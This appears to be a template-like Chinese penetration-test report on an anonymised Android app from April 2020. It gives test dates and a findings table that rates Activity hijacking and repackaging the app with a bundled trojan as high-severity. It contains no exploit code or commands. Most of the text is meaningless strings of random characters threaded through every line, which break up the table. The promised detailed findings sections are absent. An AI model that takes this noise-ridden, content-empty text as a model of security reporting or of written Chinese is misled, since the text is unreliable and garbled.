3 {* ]. a# o1 q3 f6 Y/ n e% n. {3 w$ C3 s7 w! L
) U- J3 b0 v& B% B! T! {/ V; O
* g- \, M& X% E% W2 N) P7 H( p8 b3 r
. p8 `7 t( v+ l$ a) s4 k$ h( x8 B* A8 ?* L# r* q
9 O! r* ^% D3 @, S9 W
9 S# E' t# |+ e5 J% O
" ~6 Z9 Z& k L
; f0 {) X, C3 O# \1 w
# n/ q+ g4 y' d$ F
4 D$ w, d+ @$ `3 |0 C 文档编号:
{) w& t5 U% e ]2 R# j7 r9 K9 h( E
1 ^( b# H! {: i5 d( ~! t/ v& Y7 \
. {9 J3 q+ R6 L% D# m
" g/ x R; g+ `3 |: q7 E
+ Z8 e; @' M% ~2 k# f' u7 ~
- K9 p% d. A" A3 u# V. J
, N; S. F; z8 |" F5 Z% u3 S+ T% G& [" ]' d( K
# O8 z/ O* `$ f U2 e/ }( Y
. E+ U5 C) D: o" H* k ( S! [% P( \( b P4 X
! i+ d& K5 ]% y. p
+ L; G! j; q; j# R
Z2 }6 S9 p8 q
# `* T$ p3 }" d" G( N. u( T, ^% K
: p% {$ S& j0 N# V7 v* T+ }
6 R1 `" L7 Q" y0 k) X& R7 b6 f2 {0 k- g0 B, W
/ b; q% n& G, ?& [8 Z
2 u! T' ~, ?9 B / `6 V% z V2 d! r
2 e3 N0 ]; m- Z2 H3 J
7 o2 f& \( Y) K5 a% A7 y7 i$ `4 h, A9 c! I$ G/ O: t7 S: g: ~
- [, R2 b6 O" w. f
2 h7 k! M* x/ Q3 N5 c0 d$ D/ N4 \( J5 F : b6 `5 Q5 t* \2 b7 L/ J6 }2 {& @4 f
- f% I& i& g, Y B, f1 S Q
0 q. X# U" ^ D8 f4 H _
* W5 t; A/ Z" ^. H: B
7 f* s9 u/ g( k% A8 J6 w% h
# `8 m& i) h& Q( Q; K9 D" k& G
% w9 s% @) W7 h9 _1 U
$ C4 I8 T, u+ g' l) d 某某某APP渗透测试 ) L7 k" z" J: m( p4 @, }$ @6 `
$ P& i& D8 g1 c6 \( n! }0 l0 S& S7 B
# N4 B# K1 w0 M3 L N0 r9 \* O* \
! b f4 o% I. G. f; D$ u
* @( Z; Y# N0 _( T, W4 a2 h/ P+ `/ z+ Q$ u. z! V
* ~2 k0 k: B- q( `) B. _
: @4 b6 R+ c2 K- m6 j. f, n, J
, T) I& l# J/ z: M, D
0 x# r# ^& c7 U $ ?& m9 k8 |/ b8 n
; A x( F. l! {4 p/ Q
2 H4 N7 S) j ?9 i1 K4 z( \, f' L p" j' s$ W# N, i3 `& y5 G$ W' o
" s6 P. g/ u# @' B+ f% }3 T M$ d$ O+ r& v8 L; F) J* b1 X+ d
, z# v2 b1 c6 z; L- T( v
. x8 D# p& b1 M/ v; R1 y: G+ S5 a : c% ~$ i1 \* o2 d p
/ c$ V1 p$ E( p9 X! p0 l: B9 P
% f& c; x& ?! _ Z9 w/ L* [* l: e/ z$ l6 I/ d. L
% F/ [% K _; o0 }+ k
+ Y/ _' c4 z: T( T' [" n
; h r/ Q$ r6 F$ W0 s0 O. [, l% E- s0 p
$ U8 z" w- w* |! f6 d+ L8 z$ e/ b5 i! y( m" t; ]
+ E# _. d! c, f# `# {$ {" r9 p. K9 I0 o
技 术 报 告
7 ^+ ]' ^& \( ?' K, N+ u3 ~- X) `, c! Z* w5 Q3 d& S2 w
) R9 e( Z$ {2 ~3 k$ \
3 j8 c2 u) y* \9 h - S; J1 B4 V" s- [
7 F* E# v, l1 o+ \- l( M 8 k" ~4 s/ \" C+ B8 m
# A# |5 f5 @+ v# x
$ g2 }( k5 T/ ?% g8 Q
2 Y: {7 L- U( p' T3 L2 Y% Z4 T, b
0 ^) p7 {; e( Z* W. d3 N
* I9 z K# u: Y
1 h: m7 s* X0 p" d* v0 b6 @
8 P2 h% V. s S& a0 \
, M0 ]/ {! V+ d& p0 C2 {, q
+ ~% z* X8 ^3 ?( Y/ P8 W- u) a
4 @& q! `. T9 K/ B2 s/ M, w6 ]( j, Q5 }: M7 K# W7 o1 c
" s7 Q9 o* j* }* w+ L6 o
5 k4 ?3 K; K% }' K
- u# Z" [4 J" s% Z/ W Z1 M: N4 ? q* T
6 b% n9 _$ h4 B+ g9 S3 \! u
* P, B) r" w5 @: S$ f3 v6 C 4 O) I9 Y6 i* b" T: C
) i! R! r; {6 [$ k1 F8 _8 f( t& i' [7 s
; f( O- E5 }) `3 i0 B; w9 O5 h6 B
w$ J9 W8 q0 K e 3 R0 g: B: S* I/ @ r0 P
7 }0 v3 F$ d% T0 X# V
# Y6 w' }) z* u# x$ s. |% }5 ?* k/ B$ U4 S) @ S2 T+ ~
8 w4 ~0 M" G+ N! t3 r [4 U4 ^# |) [ e; S
# M/ }( Y1 E# S5 G6 X
+ @! A7 G% W4 C$ T! m, f/ l9 ~
4 N& c, p' t3 G5 r! B
- j, ^, r' [/ t" F8 Q
9 e7 l. X" y7 b f- N+ f$ o
I, S: f9 g& S' g: G3 U& H
& `3 ]) t+ W$ U e3 s% X% O3 @) P5 @, ^/ b! g( }1 T
5 x7 X$ r+ h& i: v4 G; m8 t+ Y
8 v9 J( {& o; D: a# z
& r( s5 v& V( M0 }) U8 M1 }, z9 O3 Z
: J! i7 v3 p3 p; y* |5 h
. G9 d, g& C9 {9 Q: K5 X' n" B: [+ {; Q
8 l$ t* Y! G# b' @1 \+ H
- E+ `9 I/ L# ~; M) D6 }
9 O; r3 ] M f0 p" i- V4 a/ q6 ~- Z! E9 x$ x4 w0 s
3 v$ D; s; O/ y1 h( L: c
7 I. `$ u" ], J4 S8 X9 e, W
2 _9 B( s5 o: L4 `3 f; q$ n3 r
$ `& D; R2 |- X) x+ L" ~3 z. e7 K6 k; K
6 r0 y0 k3 c) M- l& q6 B
9 P7 S9 A# V% ]5 J
- t/ Y; S* G5 x
4 @2 B i4 @) N5 L. ^( V' g
' k: h5 E* J& Z
5 |% \* ]9 \6 h, o9 ^6 E1 }8 T& Q
" R( ^; y; J% `0 ~6 ]6 M5 l0 y. K4 X
! ~2 N' p7 x* _& U! i+ i
- {0 m+ c7 Q. N, m- L9 l
; u- u8 c/ y' r8 ]3 h2 _
; x2 s) q; a# m# L0 v: O
8 V; f) c1 a- Z$ e& @/ ^. J9 A; @' }+ z8 Y
) b* z# |8 {+ C
; o( N& n" U6 W+ u
: w1 D" H: Y& Z
* x* ^; g _: x' V9 M$ v! N8 H
0 J& ^' C9 O0 Y) G+ D0 A+ [0 n( i2 h. m1 l& ^6 V, ~
2 S+ F; b% O1 |$ I; q, @1 h# F
5 X( N5 k- R( F. p- P2 E9 d, ?4 B& B) S
6 r/ K& B2 p6 }( {
' I. }! O' k* _+ Y6 r
5 @) ^) ^: p" w9 J9 L
) M o3 Z0 D0 ?9 f3 a, y: Q: b0 j
2 J7 b! ]: p7 u3 z5 n8 u' _: d
' }6 r$ s! y, ?; H2 W- q, M
4 _' ]6 @- Q# b' E5 Z8 @9 z
- T1 @" B% P# v
; f$ P4 ]0 @. F/ M; s- N S& g% ]& Z+ W
& O6 ]( [1 j- B) U9 ^9 {: w
1 k }8 l* f" x$ v- t# k$ ]; N4 ]. j6 e
2 t- @: M. i, B( j: \# E' |
/ R# l4 T+ N7 \$ \4 H+ t% _. r; M$ j3 p: ?
1 K6 a. y" P9 K$ o2 \8 U) Q7 Z
. b0 z# U( T7 x" j" S4 ?4 M& f% R
# @* j* P0 v; X
" n0 K9 ~* y& P
) K! l4 V7 i- N5 [9 M! F; n' C
7 F7 ^% y# e* c/ {
+ Z$ _- u# c$ A9 {' m
, e5 H' U1 n3 Z K% [+ O ! B) p8 J8 \0 D3 u
4 ^& i; ?+ {7 M9 g) @% I# B
! h$ x, ]; c9 K' D9 c" b) z! @4 E
8 q+ |3 W. y, D/ r% A. j$ O
; X, \/ z; A5 O) N; o2 P" Y6 [, h; h- m
% h6 V8 C1 L: k9 F1 x
' x+ {, J" F2 J% u {4 H
7 f+ z$ H3 c( h, d0 G/ L N: D% W# P( D, O0 Q! w
& M$ m0 S$ {% C3 {) o8 R7 P0 f6 S4 V9 r
二〇二〇年
4 \1 U$ X& X/ X! K" k Q* C- v4 R3 I& v* x9 b3 D
: s9 E1 c0 x! s$ ^- V
" H2 H- k% {( \5 W
- Q+ s$ i3 _5 K* R* q
. X: b9 I2 I4 J- m4 a# [+ v# l
+ [: u9 @# x Q) d. e
" Y5 Y' o+ u" Z4 K. a2 z8 r. t
o- w1 N* M8 o6 O+ h, y }3 b( V
- ~2 j0 \! E& I. k0 t- _$ s; d2 l! M
/ ^/ r' @2 x0 X% D+ q
! @& _% b G( E3 {
: H' B* G$ s$ N/ F# Q4 P( O. y0 H
2 Y: D w) o) `* ^; S
, j8 D$ ]- v K5 T3 t, N5 t2 T
. ], y& {1 M' A3 t; d# Z , K, @) @) c& L, ^' f: a
* X, w. k4 I& a+ s e( e% C: ~
! s* i! J: B' {" `, ~
3 @, ?" B; v# ]% u# K' |8 C& M
8 o% D1 l. X" ?
3 C- [' M1 C1 O6 ` 目 录 ) J) f7 s7 G2 W" v6 [% h
' s: h" I7 G/ z0 Z/ ?
2 ?! n; R* Q7 [, ?: L1 E7 e; [2 n N' L- o9 b0 J% ^3 d
$ h1 P- y# C; I# J, h3 V. c
2 @7 M3 A4 C$ z8 W4 {
" `( c0 d0 J) S$ d
6 T7 R! A5 b- ]. E
2 H9 g( V# k5 S9 ?- T* w% w/ D( ^6 `
( S) a1 s5 i4 M/ A
. H. l9 ^: I' r/ \, v4 p6 L" g7 m# _
3 A! z" `2 v% z+ t
6 |/ X6 v- M+ O/ r; _( v. Z 1 概述... 3
* ?0 t: u4 k) O
7 ~5 j$ o6 P+ d7 C
& ^6 x; J' s6 Z
& B& w8 D* O" K. H; F 9 l# @7 ^" {5 L3 K) s6 K) C6 B
, N& l; @0 u2 y% l$ z1 P) N 1.2测试时间... 3
6 x5 O! ^) T( r( C) Q! B
( g5 v, A& g* A- ^
: V/ ]% Y, ]" w% z9 E0 D. v
0 A$ \. P' _& c" p5 b! X `+ F, o
9 U& r8 h j6 x4 R5 e3 Y/ C8 r* |9 z$ W5 {/ m7 ~8 x
1.3测试对象... 3 5 h- y8 ?- f" N& X# L7 [
/ p: A& Z2 |4 e
6 i0 S' {5 b- U/ l, w
, S6 o# T8 N E4 h* M* w6 q Z
/ u, E) E6 _: R! s! d' L
& y, D2 W6 s, p4 V' I 1.4测试结果... 3 6 z! B5 g. W2 g' U2 k
) U4 W" f+ N" Q% }! ^3 |# T
; ^8 b2 p6 P- e* k! G( H
+ Z5 h1 j, L/ k% v; X6 v6 B
% A/ s" u( o# J, ~5 P2 R) L
1 [- E5 x% Y3 j( U [9 a 2 检测结果... 4
* w! s, }- v" b+ o G0 A
8 u' o+ y! P* e$ y
: U3 n+ B% i; h/ V& D, q h8 X7 ]& J# R" l
8 r, ]6 u Q5 O& c
7 @4 _( |( T$ q# D) \) @
2.1 某某某... 4
4 @( X* q0 _+ ?4 M* @& ]
( \/ Q% x( N/ b; @: J
7 G( e! K( i4 y: Q% c1 E i, {, v+ \3 T# {6 c8 Z7 q1 S0 a
. T- Q. b/ g& u2 B
6 m5 d1 [. c; [! V. c 2.1.1检测目标... 4 " @2 { U/ a5 \4 t4 b$ K3 [; B
, X. P0 C" B& J i+ V
5 `# ]2 |$ s5 x- a( e' Z, y( U
u- X$ a2 u K' ~9 ]" W) ? 9 t2 O. s! U9 D6 J% f
# y1 S7 h; T7 D t 2.1.2检测结果... 4 % }7 a$ M C" ]2 F
8 n& H/ \5 P# ?3 t" A& Q" x
, Q2 f" G# Q& ]" ]' E
; ~1 _' H7 M0 A) R Q7 C 8 x& d% X# X8 V
, \( z# F! [- R8 l2 s
2.1.2.1. 4
/ S Y+ x4 g2 ^) ]2 c% r' O' X4 B3 _
. {$ ?% ^: N) Z+ g5 O3 X0 D0 p7 c: D! R Z& l1 g/ [
8 R2 d, }: I; r9 a7 \
* x& ?8 C, L) O8 b* i l# V 2.1.2.2. 6 5 i3 L% F. s0 ]
8 S. H3 {3 ?/ h8 U
# l6 j+ ?( c% f+ G |. P: O, `3 `& d# I/ x* ]
4 ^& x/ F6 b! }7 f$ [# \
2 K. ~& y; H% d8 {7 E : H7 ~% B: z$ H" p3 H/ [7 J- W$ X
8 |1 g. t; ] O+ r8 A i# e
! Y* |8 S- k' e
% |6 h3 b1 R$ B+ f, w/ k6 Q( H; H. R( |
- @1 G. ]7 ?7 @: Q1 w2 v
! Z! N6 b" M4 ?( ?7 l- K$ N4 P- Z% x/ }( m- Y& L) {
6 v, y, R" i6 `
. \- e. Y2 a( O# t; M! @
6 m( _* C0 O5 i, E; q4 ]- E3 h' w. i/ {
^2 f, ^+ L$ {' K
+ J; i. R9 n6 R- Q. X 1 概述
3 c9 x! x& t& |8 w/ d/ ]+ H% M8 w6 L$ @1 T" D
1 e9 `6 Y" L. i5 N
( d( ?$ z' ]1 ^) h6 n! j! a ! C4 q& j" x( G) y! Y: L
1 x2 L% J$ _8 c, Y) k
1.2测试时间
+ }# a; G4 S r3 L2 f! C1 e9 c$ h
( }8 a, C' L, |2 o W! E# S6 v) Q9 E
/ c4 I5 N* w l2 v8 h0 a% I* T: M7 D# g5 F
& ]7 y+ O# r3 G9 G8 a; S! ~1 H8 D3 c$ x1 I) ?
, p( a1 A* I2 A' C2 O' q( }8 I! a1 N+ Y' y: C8 Q# m& f4 j, }/ E
. q g& W# W# j1 R, J: _$ Q
A3 q4 k% W. a$ L# @6 E Q' U
| - H g8 O" e4 V
! R% {: D5 d, m3 f" S3 _
1 m/ C( g7 ]3 e j2 X* A) O
. d, {0 r' d4 z" O 渗透测试时间
8 O9 i* a9 p% l8 _ K5 u) M) W+ r) d( |2 B q7 Y" h$ H: F
( q2 t0 I) G h) ?$ U* i% A" {$ M4 T
0 ~. }3 w# ^. Z! ~4 i3 I8 @ | 6 F& F* d% Y5 I/ n
& W" S4 ^ c/ t" h
7 k6 l$ X! V7 w: e
3 N1 H" N$ \% e: f1 ]
. U) p" m+ u! |5 t9 q7 [5 V; f- p+ h& P) Y7 G3 ~5 H
| 1 b! [0 _" Z3 B4 P& I3 x
: t% C' v8 R& }% O5 O# W
M5 h: H1 h% A' J
# |% `: ~; ~. I" o# L* q, | 起始时间
/ o9 V! _- t! ~3 x* ?+ ]* S
2 }- z0 H! M/ k; p
8 N6 n/ l" c+ @/ I9 M% Y, y% k3 j- a- k" h! Y" ?+ Y, b
| : Z' L8 A' K" w$ B6 @% \
3 B# f& G8 K) O; r% I ( q% P( P1 ^: Z E7 J) x
" ?. h7 A3 T' l2 e
1 a* A0 ^7 n, _
7 q3 w5 g) G. X
2020年4月6日
! ?7 u. ^! Z% Q' `6 P7 v* g2 z& i/ L% y1 {4 Y$ b+ n
. G W$ j3 O/ A1 q* L' O% z+ J8 J; x) r4 L9 B" c% N; h: @
|
- g$ r$ o) u0 ]2 ~- ~9 i* h% P4 N$ E. J+ Q) Y; X1 d a$ O* t2 M9 [: C) |
' z* ?+ o% ^/ r9 b! U# o8 n
% Q; S; t& e' G: {8 v ' f) [. g! [7 f
4 ? D1 Y/ H6 P" P. x5 A
| 5 q* r2 t( H, ]) |% Z& H
# n t& e1 f5 ]- T 1 E6 a) R' } E, v3 u# T6 X5 X
/ c) B# g) L' ^1 N- H! D 结束时间
3 D% p: A5 K2 ^. h, {# t, Z6 ~4 ?+ q* ~0 B2 h, }, Q3 L
. |# H* S3 |) q8 r" ?
; D$ F1 Q; i( g5 _0 i
| - b% ~/ p. X0 P% G! T/ ], v$ v- g
0 x* U2 G" D9 {5 m* ~! y1 M
8 Q- N) Z, K- X6 v% M" S9 [7 x; u. v2 m& B! R; u) e
) w0 H2 Y5 `% [7 R& ]
# n/ h/ z3 S; e `) {! U. g5 ` 2020年4月9日
k( l" V6 z; a( v2 U B2 s. i) s
9 ]3 Y1 ^% g4 C$ R
. x9 U7 Z, x6 i3 B) J; o8 |1 ~- ?! M _9 O
| / r" K( z5 |5 [8 a9 j& A8 C1 G- P
; O' ~2 u& M1 A9 n7 _5 d
' ~7 t$ F: ~0 a2 I" \' \# |
+ W8 a7 c0 y2 r1 I. i% [1 b1 d% `& m
1 T ^' u% B/ J7 R/ p, `6 Q* j, S) N, j& s" }
5 x- [% v' j7 ^: F2 E
: M o( n5 l" |, v
% U9 x" O# X! i0 b1 |2 o3 g1 h% C
G, C) G) V1 o1 K0 s# { 1.3测试对象
, D+ H g/ z; q! v9 d, X6 v
1 U. ]3 h$ D/ ^# z
5 z; @. p r" ]$ C2 Y- K
7 @. T. D3 N- W" l 5 t! X$ ]7 k, w5 p {. Z( W
! t3 |$ r4 `/ y, o$ _' Z+ c3 G
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: : a( f% K- Q+ b) d
$ J$ }4 l q1 a& r
' p' R& F3 h8 M1 v V
) E( i1 P( k9 `: ~0 l
3 R! a+ W8 M) Q6 F! t/ s
* X- j# @$ n2 M8 o( C) r 表1-1 检测对象 8 b' T4 }: w1 _+ ^( h8 Z4 w2 F% t
: h$ r* W; x3 n) ^7 n
, n! Q! C3 i. Y! t/ j% X8 \" L) k0 b6 g4 K2 g. C# y
4 v4 d, l j+ A0 R! |
* R7 U, `- \& A9 i9 X) c2 i3 K
$ `( ^ Y3 s/ n+ l3 {: F
2 R# G# i+ o* u ! V; {9 ~; E. ? d$ @( p! a: l% I$ o
- {5 D U6 ^. c) z' ~ L6 k
| / t- c( B+ j' W0 B1 M: k# Z
2 S7 @! l# }8 j5 s
: e# o' r) M6 R2 I7 p1 N
0 l( U+ z% i* S. H- m* _. D& O
序号 9 Y( c( U/ Y% H, n% i) H, @
$ s2 x" }: X( Q& K
7 q/ B4 J% R: w5 p- x" O1 G! y
| * B3 R; o5 `7 w. Z! \- n4 o: c% B# H
! d" V+ \1 K. D; [
6 _4 m0 y* g; z8 M) _3 x
+ X# A$ n* A ^
) N7 Z" J9 q+ y" r% O2 n7 U Y% {1 ?9 X
测试对象 * T2 Z6 M* f: k4 w1 a: M# x( }
& @1 s1 N! E% v' x i# `9 A+ J
' e7 b4 [" M) y+ _7 S
5 ~" M9 W* Q# H) N( H3 ?
|
4 E! j" Y5 b% a! g% E; r
o6 K$ ^# u5 E3 N" L; i
. C4 ^+ B' d- O% u; Q; M2 ]5 B7 P, W* x0 T" u0 M7 b1 _0 C9 N
1 I/ x0 ?' N& ~ z: ]
! n, y5 ?, \( J$ m! {8 \ 测试地址 # A0 H% h0 ?( X: n# ]
2 t% n8 X$ l$ _1 q( R( r N! F9 Y- H$ ~. k. A' M1 f
! x0 B( e2 ^ V a$ t | # T. P2 B" q* [% B1 n, Z7 H# @ D
( b0 V! I' q0 o: j& N, R& H
8 l6 u! T: f9 Q& K$ A7 w) k$ |, ^/ i9 ~
' V, |- l+ K* M- O& }% q4 C/ p& f5 m6 ?) G: ^
安全漏洞 * q" `9 Y5 u5 O0 Q' p
, G8 V4 G- x& [6 O # b N6 A9 u! P7 F
) w$ ]. c) W4 L | ' l9 F: U" Q" y' T
9 y# m% D' R5 j5 P4 B
4 U% Q* c& H; }# e2 ^3 x- k
" _0 ?0 S& u, E
1 l* m" v3 U; s& U) `
% s9 E; P Z7 |9 d8 Q |
0 z3 a9 y0 l1 [6 |1 \! b4 G. k( r
7 Y' a/ _9 Q& Q/ g- K( f ( l8 k2 ?1 U4 H
5 s) U& R" Y1 J! ?" i: O 1 . |6 s Q$ z4 y3 y2 }3 ~
5 x( x, `$ M$ C7 W) Z3 ~& r- B
& @ e7 y0 D$ k& \1 x/ @0 g4 N. D4 [! [$ b# C5 s$ i+ h- Z
| ! u& p, {, H8 V
9 F R1 W' ^& C/ ?/ n
5 H' ~0 s6 v3 @
9 B# l! u, `/ ]. a
5 X2 u% \+ w2 \9 n J$ v! g$ d1 \3 d$ Z
某某某安卓APP
5 K1 M4 }1 V9 k" V" s1 y% q, w4 X- `
$ d1 f; O# t1 U
! n0 {( s: x( |6 D8 _; B' ]
| 3 c$ { M1 N8 D1 V R& I7 f& X
( ~/ g7 k5 j- Y: t- k8 q. ]
% | l4 y. S) r D f8 n2 x: x* x7 R A
8 @4 n$ Z- g6 O, I" j% j
% j8 u8 g, R% z 0 b' M$ ]/ K" e- `8 y( B
! m7 Y( P8 H0 i- |5 x) I$ z8 m, i
$ F' u' W9 y8 {4 }" j; ^
, k; J w! s/ n' o7 K |
2 b$ [: {8 ]% u+ }' h( Z9 P& [! |( S+ R$ Z7 S3 z, X0 \# j* Q
; ~. D. d- V$ I3 k5 k- n- C; Z7 G# E; w) I3 E3 h3 G
& Q: o& r: Z' L9 m0 `" x$ a* b; C; p) } E' V& H/ x7 P
2 # r4 Y8 \% ~$ K$ E, U
0 b# z. L) f8 S$ |% j$ a: V$ S6 C
, i$ T2 f$ {8 g9 i: H0 ^+ H2 z5 ]0 r+ E
| ) `9 O& b) l& |3 L; S3 j: Y
# }2 {' b3 v# N9 A
: d' t* s; y2 \) ?4 N( a+ R1 }. d" r; T9 W
6 r1 e: S% ^2 \1 h( F( D
I% O+ s( x' W
1 G0 \9 n0 ]( g2 [: j/ h4 _" a9 ?" ^ s/ w/ N
' `5 m8 f u$ S2 ?: }
' F" v9 f( k. e* ^ 1.4测试结果
2 `" [( e( V/ R1 q% T" D1 w1 L( o8 k# }$ w; Y7 Y3 R
# M8 A: k, S0 {( o) i j
: D8 r1 p- J1 i9 X) ^( b3 I
" ^# X: M& e" |$ X9 o
' N- z* b: ]0 T6 K ` 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
% E# X4 Y: M7 i4 T) @1 i. Y8 m5 \/ d
5 {0 \' K9 g7 W2 b* ^8 Q
( O2 s. D9 {; N z1 c
# @/ k+ W* T Q : h3 \2 @9 A+ I% E
) K7 n1 W$ G: B- i0 H
& n. ?% i: o: Z8 j* Z* `! o9 m8 a9 N! M
: X. L& Q* O' J( Y! m$ S$ P; g( t: B1 p) Y/ o; k2 J, H
0 \; _ {4 L) N% [" y V+ ^( ~9 K$ Q5 B
" c% I# t1 j5 v$ Z3 r
7 q3 `& u# [' ~8 _& y# ?) l0 I1 G
( H2 t, g4 V- b, t* c6 H2 @2 Z" \% e/ J# F6 _* k+ U+ z
+ v6 s9 T m! H5 d3 e
/ `- {5 r) @5 U; Z | r! ?' L6 B) y# a
1 s$ J( v. I7 ?: H) S, o ! `$ {7 @, I) |8 e5 }5 }0 g
' _+ W: |9 Z$ r; ]" G2 E 序号 * `0 V! ^( e/ {, P
0 `$ A8 s; [( u$ I3 z
; M( r" ]; [6 e( z9 Z6 J4 j4 G6 t0 o7 h, @
|
+ n$ j) }3 o: C9 ?" G) K' [
0 I) K9 u0 B4 Z; p6 G; _3 D' s2 ^- n 0 [: _: G f9 ?' B2 j8 d/ s3 E) O+ q
7 E( { [8 C- I8 {( e2 a
: Z- p, o( u2 X* O6 p
5 k4 N& c) [2 v$ ^/ B 系统名称 * @# _: \! _0 l: v" Q
9 K' X8 r, p+ I1 i$ ?& H2 C# k9 T
, a0 `# n' Z) {" f& O3 |" z9 c3 |# Z# B* E
|
- q# T3 o5 Y: Y1 w8 I3 @
; ]; U! j4 i0 M/ [2 U, i
3 K' K; A* K! x( G- B/ p( z u& e7 Y% W
% e5 O! i+ ` t& Y- Q0 \1 x6 A# w2 E$ a1 f+ a: Q
漏洞名称 6 d' ?2 Z+ p' {+ p! H0 J/ v
% a* \* s. ?* {3 Q6 ?' M
' }+ R5 d$ d2 _7 n. z; b# V" h. Z! C3 r1 x3 R
| Y/ }% V# h' p1 \) q
' t4 H2 Z: `( {9 a) g
, g8 b4 h) O3 g# o# k: X9 l8 E% }- V% Z
. Q7 H" Z: U6 a2 z5 ] [
! H. V* h. _* T 漏洞危害 1 k" s- c( M7 k4 A/ Z
$ b7 d" p, `& u
& Z2 s0 P( g- p( n5 W3 S% |% }8 p- @6 y' M" G, @; ]* P
|
0 B8 r5 ?; ?% T2 [* a6 S5 V; ]$ V9 A- t
: ^* t. Q8 _; b; u( k$ p' G
3 ^7 n) S* J0 B/ ^- l
2 |, ^! U, b6 Z
8 v9 W$ A' H1 h4 A 修复结果
( L `& \4 ?* I! S& e! x! b( \. P+ M, H
1 v5 @" t8 |3 u: o3 o
' R7 L- D+ t4 N& e f% y2 o |
! X3 E- A6 u g# K3 c, |+ g# D+ h5 j9 A, i0 H n6 V
8 u; i* {, x2 I O
! h' w$ C0 r/ R; ~" x 7 ?* n7 G* S; m+ Q2 C" `
% Y @" H) m' c3 y$ z7 y |
! u V" o4 Y& f* c4 y
t3 a+ V5 J6 G' v, a 0 O u2 }3 E! T" ^
- ?. f) m' r/ A+ V 1 2 |' F0 e7 ]- k
" F3 P# M* W% L P- C- {$ ~+ o( o
# n7 w* r. t* C; A" L5 F( d. n4 d! _( ]- B: `5 W
|
+ Z$ t2 o# U, e6 e* Z. y# {
# O t6 s2 p" x: B2 Q4 D% m0 t5 j 2 y" ?* G; c! c+ I8 N
9 ~7 o# t0 e3 X2 S/ g: o. ? # E& Q) D; c1 O+ ]. S
' y! y/ z) U. F w3 h4 D
某某某某某某APP 1 d: t" X3 i; T+ b1 T3 |) B
5 a, M# U. ^# k4 O3 K) K
; c/ |% m7 S1 c. J, [* q n6 Z& T
. Y7 O% g9 N8 Z- d4 ~ |
' e8 }1 o# R" J, o. P* H! i7 [4 f/ _0 i3 }
3 d* K8 @, l+ C; u9 m
\ Q2 W! i8 o2 i
) [ [* [* _& X* {$ C
9 v6 _" J. L+ P# g# P* B
Activity 劫持
( K5 ?" [( R+ F( |
1 }- m9 ]; X. X3 T' ^
. }3 t/ l' E( M' K: {2 \2 R! c* P; j. J8 g; w5 k+ m
+ G* s4 m1 n* D5 F- A# t0 V7 r: N+ H
4 C3 e$ l7 @. z* T8 f4 o9 `7 z
. P; [ J5 i j: Z; C$ g" C. m
8 I( W* r7 G0 V) D
! Q9 ~3 {7 D% h) F/ b
|
; @/ c+ ?6 D3 D& w. h$ h/ l% m0 w, V0 B0 J& g
7 R, I6 G9 W4 N0 W& ?6 R. x5 s
; [0 D& M0 ~4 c! R: {8 j* h 0 w W: s+ U% r; p* d9 h7 E
/ H6 T# e# \: M/ |6 q2 S" y
高
) H3 `7 P, x: U! A' z
; u3 e0 s+ ~; }7 t& G+ ]& R
" G: X0 T" x3 f' V$ m3 E0 V0 r5 c- g, a1 ^5 d' V9 S7 v
|
! a' o$ C; c# g4 ^+ ^
3 Z m' C: A0 j' \. u0 x5 a * R8 ]* W4 W* Z( j7 g1 Y& v
7 z: F3 n4 I' l9 f ! @6 L. }5 j {( G9 [
0 T" @2 `5 J2 h7 P! V& M& l3 Q
$ Z' A4 {& W; K4 J3 A
# K R9 C3 }. V0 Q7 a# Q y |" K. ?) u
& S5 f* C$ L) ~" J
7 ?# j7 B" x2 w: a |
* R& ^, w, K8 x5 C0 q3 z, e# d' k
1 E9 c+ r: z" ~: L
& @9 i- c7 p' |8 b
+ T6 J# O2 b& z7 d1 g0 P- C; u
/ p; f6 z5 h6 U; o, h% w1 d
8 ?" B: g. |4 e |
5 E8 O! r5 O, e6 X; d3 H3 I1 ?/ ^; v8 X( `' [1 [) q% M
8 r5 j3 e* z! K1 V d
$ t7 V7 ]6 Q) T7 g$ I+ }6 S 2
3 H0 ~% w% d0 \" _5 x2 K1 v8 y9 @6 i& [+ X& [5 G
6 w& W3 r8 G+ T3 I9 @5 T
! | J1 E4 d* I* T7 T | + r4 @ g5 ~5 A' [
8 w- V3 C/ Y$ K# ]& A( \ `
% o6 L2 a& O. N- F _$ n. @5 E' ?8 g9 w8 w0 X s2 O: D
* Z3 W2 b7 A( G* x6 g
6 K' ~, Y" X% j7 j! z& a! ?
某某某某某某APP
* j& K; {* R# x) H! r2 H$ k0 o8 P6 U5 i2 H* V+ ?1 M# c
, r1 n( L' ?5 ]9 F4 P% p1 c
' S* `$ o/ _3 z8 R: Y
| % s' Y" W& N( G7 Z( V: g
' n7 e0 _, ^6 F6 }+ e0 B
2 T' O/ \3 a: |) E5 {2 i; p
! C0 Z- Q9 Q% Z) }. j: g
& h3 i4 o/ ]8 G8 O6 j
! L4 n9 f. Q# F# {. U* V3 b# E8 \ 反编译二次打包捆绑木马、篡改APP代码 & Y0 G- r! `0 S* v
( ]1 j$ q. G# ]# n @ 5 J* j& N7 s; m: w* T' d
3 r) l1 ^! Z6 F+ [9 w% r3 R8 ~ | 0 r0 |# _( ]% C
/ E: p+ P, \/ v& Q5 E
& ?3 l" E/ k: }$ \5 \+ C/ C- R! E; a3 j. n; J Y9 [, Q
7 D3 v" l; X" v3 N' g6 O
3 v' h- X! X$ f, W) d+ Y' j! O
高
9 C1 ]: t- f+ `
( o* e! I2 W) v; z9 y Z ' \" V! F0 m- M9 f* G; `
. X9 O4 i Z; m3 A' O, O- r
|
0 F1 V# X, p9 Q3 `* g% G: p' |/ E7 W7 j/ }0 r& X. @
4 V, `6 L0 W$ W2 d/ l7 ~& j2 ?( ] q6 U* O0 k2 T
2 L% p* x/ D: x* R- @" N) s' [, U+ i
6 M8 B0 ` q! q
4 n* Z! p7 H5 h/ [5 Q) J
8 E% T; F) {8 T, D5 O3 S
* e/ m' D8 X- q F- y) }
! C0 Q0 e' Z% ] |
; {8 S- d& l( I. p* U+ f9 J
9 a# ~; i. i& C# Q- c
) u3 H. N& x/ J3 `! Q5 [# H: G3 P. l0 U4 h0 t9 ]
& A* K5 x" z5 p# v2 z) f# N
2 ]9 R5 S% P1 r, W A! J
' Q7 t1 ^, V4 p! x. v/ W* @0 x0 t9 c; H
. f6 R: E3 P8 B3 h
# {8 \4 {9 s- n' k. e
# a! |5 i% y' |8 I+ y6 K7 |) w- I, z% Q d- n! ?
' T: t: t& ~; p( E
